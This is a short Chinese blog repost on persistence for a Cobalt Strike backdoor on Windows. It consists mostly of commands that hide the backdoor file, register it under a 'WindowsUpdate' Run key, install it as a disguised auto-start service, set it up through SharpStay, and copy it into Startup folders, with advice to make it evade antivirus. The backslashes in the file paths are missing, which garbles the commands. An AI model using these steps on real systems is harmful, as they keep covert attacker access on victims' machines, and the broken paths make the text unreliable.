cobaltstrike权限维持

admin 2025年5月14日10:46:39评论11 views字数 900阅读3分0秒阅读模式

1.注册表启动

注意:优先用这种方式来进行权限维持

task.exe是CS生成的后门文件,这里后门文件可以对其做免杀

隐藏文件

shell attrib C:Windowstask.exe   +s +h

cobaltstrike权限维持

注册表启动后门文件

shell reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v WindowsUpdate /t REG_SZ /d "C:Windowstask.exe" /f

cobaltstrike权限维持
cobaltstrike权限维持

2.windows服务自动启动

隐藏文件

shell attrib C:Windowstask.exe   +s +h

服务自动启动执行后门文件

shell sc create "WindowsUpdate"  binpath=  "cmd /c start C:Windowstask.exe"

shell sc config "WindowsUpdate" start= auto

shell  net start"WindowsUpdate"

cobaltstrike权限维持
cobaltstrike权限维持

或者

cobaltstrike权限维持
cobaltstrike权限维持
cobaltstrike权限维持

3.SharpStay.exe 自动化任务启动

SharpStay.exe action=CreateService servicename=Debug command="C:Windowstask.exe"

cobaltstrike权限维持
cobaltstrike权限维持

4.自动启动服务目录(win7系统才有效)

shell  copy  "C:Windowstask.exe"   "C:UsersAdministratorAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupWindowsUpdate.exe" /y

或者

copy  "C:Windowstask.exe"   "%programdata%MicrosoftWindowsStart MenuProgramsStartupWindowsUpdate.exe" /y

shell  attrib "C:UsersAdministratorAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupWindowsUpdate.exe" +s +h

cobaltstrike权限维持

原文始发于微信公众号(渗透测试研究中心):cobaltstrike权限维持

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月14日10:46:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   cobaltstrike权限维持http://cn-sec.com/archives/4061785.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息